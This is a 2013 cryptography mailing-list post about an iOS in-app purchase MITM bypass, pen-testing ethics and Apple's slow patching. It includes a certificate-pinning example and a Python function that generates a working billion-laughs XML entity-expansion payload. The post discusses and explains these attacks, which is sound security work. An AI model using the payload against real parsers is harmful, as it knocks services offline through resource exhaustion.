[cryptography] yet another certificate MITM attack

Jeffrey Walton noloader at gmail.com
Sat Jan 12 18:29:50 EST 2013

On Sat, Jan 12, 2013 at 6:11 PM, Kevin W. Wall <kevin.w.wall at gmail.com> wrote:
> On Sat, Jan 12, 2013 at 4:37 PM, Jeffrey Walton <noloader at gmail.com> wrote:
>> On Sat, Jan 12, 2013 at 2:35 PM, Kevin W. Wall <kevin.w.wall at gmail.com> wrote:
> [snip]
>>> Whoa...hold on there Jeff. I'm hoping that I'm misunderstanding your
>>> last statement about what the pen testers did to "destroy a secure
>>> channel".
>>> Are you implying that _authorized_ PenTesters using software such as
>>> BurpSuite (or Fiddler2 or Paros Proxy, or any other software that
>>> leverages the browser's _forward_ proxy ability is violation of some
>>> law or morals? If so, I would wholeheartedly disagree. They are not
>>> capturing arbitrary HTTPS traffic of others, but only that originating
>>> from their
>> http://arstechnica.com/security/2012/07/ios-in-app-purchase-service-hacked/.
>> In this case, the user trusted the certificate and took control of
>> infrastructure. The result: the developer possibly absorbed a
>> financial loss.
>> Note: there was no Jailbreak required, no re-engineering of the IPA
>> required, and no low-level debugging required. The user trusted a
>> proxy certificate and gave bad DNS answers through a server under
>> his/her control. That was it.
> Well, I think you made my point. This had nothing to do with "penetration
> testing" or Burp Suite (AFAICT; the YouTube video from the cited URL was
> taken down because of claims by Apple of *copyright* violations.)
> Furthermore, while all the details are not available, this does not seem to be
> using the same mechanisms (of browser's forward proxy) that Burp, Paros,
> Fiddler2, etc. normally use. They generally have you run the proxy on some
> localhost ports (8080 / 8443 are typical) and a self-signed certificate is
> usually used to the SSL port of the proxy.
No. You turn on WiFi and proxy the device's connection to your laptop
(been there, done that :) Burp Suite even fixed an annoying bug over
the summer :)

> That doesn't mean that Borodin
> himself didn't use something like Burp or Paros to figure out how it all worked,
> but IMO, that's irrelevant to the whole pen testing angle.
I'm not picking on the pen testers. I claim it's something they do on
nearly every pen test, and no one ever raises a red flag - even the
folks who are supposed to raise the red flags.

> This appears to be an
> illegal (well, maybe not in Russia) hack exploiting an Apple vulnerability.
> It most certainly is a violation of Apple's EULA and TOS.
It's not illegal (thanks Jon). The DMCA proper (PUBLIC LAW 105–304)
has exceptions for reverse engineering and for security testing and
evaluation. The RE exemption is in Section 1201(f) (REVERSE
ENGINEERING); the ST&E exemption is in Section 1201(j) (SECURITY
TESTING).

> I simply do not think it is fair to reference this specific case and then to
> characterize the general use of proxies by *authorized* pen testers as
> something illegal or immoral.
I'm not. That's why we engage the pen testers - to find what's broken
in clever ways (sometimes, not so clever).

I claim it's sad that the security architects watched pen testers
destroy the secure channel and thought nothing of it. If that were my
application, or if I were the architect responsible for the
application, I would be pissed and looking for ways to fix the hole.
After all, we *know* infrastructure is insecure.

>> BTW, Apple did not fix the failure with technical controls such as
>> public key pinning. Taking advantage of the pre-existing relation
>> between the developer and Apple (using 'a priori' knowledge) must have
>> been too secure (?).
>> Instead, Apple gave the developers instructions on how to verify a
>> purchase (i.e., implement this bit of PKI); and they sent their
>> lawyers to do a takedown. Double fail.

> I'm glad to see that you view this as a failure of Apple and not as
> something you are blaming on pen testers "destroying a secure
> communication channel" using something like BurpSuite. Whether or
A 'proper' solution would have been resilient to [expected] failures
in the infrastructure; and resilient to some failures in the platform.
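A minimal sketch of what that resilience could look like, using only
Python's standard library: pin a known fingerprint of the server's leaf
certificate and refuse the connection when anything else is presented, so
a proxy's substitute certificate fails even if the user has trusted its
root. The host, port, and fingerprint here are hypothetical, and a
production pin would usually cover the SubjectPublicKeyInfo rather than
the whole certificate:

```python
import hashlib
import socket
import ssl


def cert_fingerprint(der_bytes):
    """SHA-256 fingerprint (hex) of a DER-encoded certificate."""
    return hashlib.sha256(der_bytes).hexdigest()


def open_pinned_connection(host, port, pinned_sha256):
    """Connect over TLS, then reject any leaf certificate whose
    fingerprint differs from the pinned value.  A MITM proxy's
    certificate fails this check even when its root is in the
    device's trust store."""
    ctx = ssl.create_default_context()
    sock = socket.create_connection((host, port))
    tls = ctx.wrap_socket(sock, server_hostname=host)
    der = tls.getpeercert(binary_form=True)  # DER bytes of the leaf cert
    if cert_fingerprint(der) != pinned_sha256:
        tls.close()
        raise ssl.SSLError("pinned certificate mismatch")
    return tls
```

The point is that the pin is 'a priori' knowledge baked into the client,
so it survives a compromised trust store and bad DNS answers alike.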

That was not the case here, and the security architects did not raise
a red flag. That's a fail on the architects.

Apple software security is an absolute joke at times.

> not Borodin had make this exploit available to the masses, the vulnerability
> still exists. If he would have only reported this to Apple would they
> have addressed it?
Probably not. I reported items years ago that have not been fixed.
Apple's XML parser still suffered from a billion-laughs attack over the
summer - I personally performed the tests (iOS 5.1.1). It took Apple
months to remove the toxic DigiNotar certificates. It took Apple three
years to fix the FinFisher bug.
Etc, etc, etc....
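For reference, the billion-laughs payload mentioned above is nothing
exotic: a small DTD whose nested entities multiply on expansion. A
sketch of the conventional construction (the entity names are the
classic ones, not anything specific to Apple's parser):

```python
def billion_laughs(depth=10, fanout=10):
    """Build the classic nested-entity DTD: &lolN; expands to `fanout`
    copies of &lol(N-1);, so the root reference expands to
    fanout**depth copies of the string "lol"."""
    entities = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        refs = f"&lol{i - 1};" * fanout
        entities.append(f'<!ENTITY lol{i} "{refs}">')
    dtd = "<!DOCTYPE lolz [" + "".join(entities) + "]>"
    return dtd + f"<lolz>&lol{depth};</lolz>"


# With the defaults, a document of roughly a kilobyte expands to
# 10**10 copies of "lol" (~30 GB) in a parser that resolves general
# entities naively - which is the whole attack.
```

A hardened parser caps entity expansion (or refuses DTDs outright)
instead of resolving this blindly.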

As I said, Apple software security is an absolute joke at times.

